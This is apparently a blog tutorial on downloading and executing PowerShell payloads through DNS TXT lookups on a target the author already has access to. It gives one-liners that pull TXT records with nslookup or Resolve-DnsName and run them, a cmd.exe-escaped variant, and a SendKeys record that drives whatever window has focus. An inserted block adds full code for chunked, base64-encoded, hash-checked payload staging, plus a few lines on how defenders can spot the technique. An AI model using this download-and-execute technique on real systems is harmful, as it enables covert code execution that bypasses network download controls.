
DNS Payloads

Execute DNS Payloads: [ How it Works ]

This trick is useful when you already have access to your target but have no way to download anything onto it.
Have you ever thought about how a DNS lookup works?
There is always a way.
In this post I will show you how to download and execute payloads through DNS lookups.

Attention

You shouldn't do this in an environment where you are not allowed to.

Download payloads through DNS

First you need to create a new DNS entry on your host, like this:

type | name              | data
TXT  | hello.example.com | echo 'this is a payload through dns'

Now you just need PowerShell to execute this payload:

powershell . (nslookup -q=txt hello.example.com)[-1]

nslookup prints the TXT data as the last line of its output, [-1] picks that line and the dot operator runs it. Did you see that? Isn't it amazing?

Now take a look at this example, which extracts three lines from the DNS records of a domain.

Let's say you have created 3 TXT records like this (the trailing semicolon matters: the three fragments are joined with a space before they are compiled, so without it echo would simply receive the other words as extra arguments):

name           | data
1.example.com  | echo 'hello';
2.example.com  | echo 'from';
3.example.com  | echo '1337';

and you use this payload (the loop counter $_ builds the names 1.example.com, 2.example.com and 3.example.com, -Ty is short for -Type, and % S*s expands to the Strings property of each TXT answer):

1..3|%{$p+=Resolve-DnsName "$_.example.com." -Ty TXT |% S*s};&([scriptblock]::Create($p))

The result would be:

 hello
 from
 1337
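The two steps above (creating the records and pulling them back in order before running them) written out in full, as an added example that is not code from the original post. It assumes a zone example.com, chunk records named 1.p.example.com, 2.p.example.com and so on, a manifest record 0.p.example.com carrying the chunk count and a SHA-256 of the script, and base64 encoding of the script so quotes and semicolons in the payload never collide with TXT quoting; all of these are choices made for this example. The resolver is a pluggable scriptblock so the logic can be exercised offline against a constructed zone; only the default resolver calls Resolve-DnsName.

```powershell
# Added example, not code from the original post. Zone name, the 'p' label, the
# 0.p... manifest record and the chunk naming scheme are assumptions for this demo.

function Split-DnsPayload {
    # Publisher side: turn a script into numbered TXT records. Record 0 holds
    # "<chunk count>:<sha256>" so the client can verify the reassembled script.
    param(
        [Parameter(Mandatory)][string]$Script,
        [Parameter(Mandatory)][string]$Zone,
        [string]$Label = 'p',
        [int]$ChunkSize = 255      # one TXT character-string holds at most 255 bytes
    )
    $bytes = [Text.Encoding]::UTF8.GetBytes($Script)
    $hash  = ([Security.Cryptography.SHA256]::Create().ComputeHash($bytes) |
              ForEach-Object { $_.ToString('x2') }) -join ''
    $b64   = [Convert]::ToBase64String($bytes)
    $chunks = @(for ($i = 0; $i -lt $b64.Length; $i += $ChunkSize) {
        $b64.Substring($i, [Math]::Min($ChunkSize, $b64.Length - $i))
    })
    $records = @([pscustomobject]@{ Name = "0.$Label.$Zone"; Type = 'TXT'; Data = "$($chunks.Count):$hash" })
    for ($n = 1; $n -le $chunks.Count; $n++) {
        $records += [pscustomobject]@{ Name = "$n.$Label.$Zone"; Type = 'TXT'; Data = $chunks[$n - 1] }
    }
    $records
}

function Invoke-DnsPayload {
    # Client side: fetch record 0, then chunks 1..N in order, rebuild the script,
    # check its hash and only then compile and run it.
    param(
        [Parameter(Mandatory)][string]$Zone,
        [string]$Label = 'p',
        # Hash pinned by the operator. Without it the check only catches broken or
        # partially spoofed answers: whoever can forge every answer can forge record 0 too.
        [string]$ExpectedHash,
        # Resolve-DnsName can return CNAMEs next to the TXT answers, and one TXT
        # answer may consist of several strings, hence the filter and the join.
        [scriptblock]$Resolver = {
            param($Name)
            (Resolve-DnsName -Name $Name -Type TXT -ErrorAction Stop |
                Where-Object Type -eq 'TXT').Strings -join ''
        },
        [switch]$ReturnOnly     # return the script text instead of running it
    )
    $count, $manifestHash = (& $Resolver "0.$Label.$Zone") -split ':', 2
    if (-not $count -or [int]$count -lt 1) { throw "no usable manifest record at 0.$Label.$Zone" }
    $b64 = ''
    foreach ($n in 1..[int]$count) { $b64 += & $Resolver "$n.$Label.$Zone" }
    $bytes  = [Convert]::FromBase64String($b64)
    $actual = ([Security.Cryptography.SHA256]::Create().ComputeHash($bytes) |
               ForEach-Object { $_.ToString('x2') }) -join ''
    $wanted = if ($ExpectedHash) { $ExpectedHash.ToLower() } else { $manifestHash }
    if ($actual -ne $wanted) {
        throw "payload hash $actual does not match expected $wanted; refusing to run"
    }
    $text = [Text.Encoding]::UTF8.GetString($bytes)
    if ($ReturnOnly) { return $text }
    & ([scriptblock]::Create($text))
}

# --- offline demo against a constructed zone, mirroring the hello/from/1337 example ---
$payload = "echo 'hello'`necho 'from'`necho '1337'"
$records = Split-DnsPayload -Script $payload -Zone 'example.com' -ChunkSize 32   # tiny chunks so several records appear
$records | Format-Table -AutoSize          # these are the TXT records to create in the zone

$zone = @{}
foreach ($r in $records) { $zone[$r.Name] = $r.Data }
$fakeResolver = { param($Name) $zone[$Name] }.GetNewClosure()

Invoke-DnsPayload -Zone 'example.com' -Resolver $fakeResolver      # runs the reassembled script

# Simulate a forged answer for chunk 1: same length, still valid base64, different bytes.
$zone['1.p.example.com'] = 'AAAA' + $zone['1.p.example.com'].Substring(4)
try   { Invoke-DnsPayload -Zone 'example.com' -Resolver $fakeResolver }
catch { "blocked: $_" }

# Against a real zone, once the records exist, pin the hash you published:
#   Invoke-DnsPayload -Zone 'example.com' -ExpectedHash $records[0].Data.Split(':')[1]
```

The pinned -ExpectedHash is the part that actually buys you something: a resolver that can answer for the whole zone can rewrite record 0 just as easily as the chunks, so a hash that only lives in DNS protects against truncation, misordering and partial spoofing, not against an attacker who owns the name. On the defensive side, the same technique is visible as nslookup.exe spawned by powershell.exe, or as TXT queries for numbered names that nothing else ever asks for.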

Attention

If you launch this through powershell.exe from another program or shell (for example cmd.exe) instead of typing it into a PowerShell prompt, you need to adjust your payload like this:

powershell 1..3|%{$p+=Resolve-DnsName \"$_.example.com.\" -Ty TXT |% S*s};&([scriptblock]::Create($p))

Spot the leading powershell and the backslashes: you need to escape the quotes and put "powershell" at the beginning. Keep in mind that cmd.exe treats an unquoted | as its own pipe, so from that shell the whole command after powershell should be wrapped in double quotes as well, with the inner quotes still escaped as \". Now let's take a look at this DNS record.
Of course you can use your imagination for any other payload.

Add-Type -A System.Windows.Forms;$o=New-Object -C WScript.Shell;Saps https://example.com;Sleep 3;[System.Windows.Forms.SendKeys]::SendWait('{TAB}{TAB}{ENTER}');Sleep 1;[System.Windows.Forms.SendKeys]::SendWait("%{F4}")

This record loads the Windows Forms assembly, opens https://example.com in the default browser with Start-Process (Saps), waits three seconds, sends Tab, Tab, Enter to whatever window has focus, and finally sends Alt+F4 (%{F4} in SendKeys notation) to close it.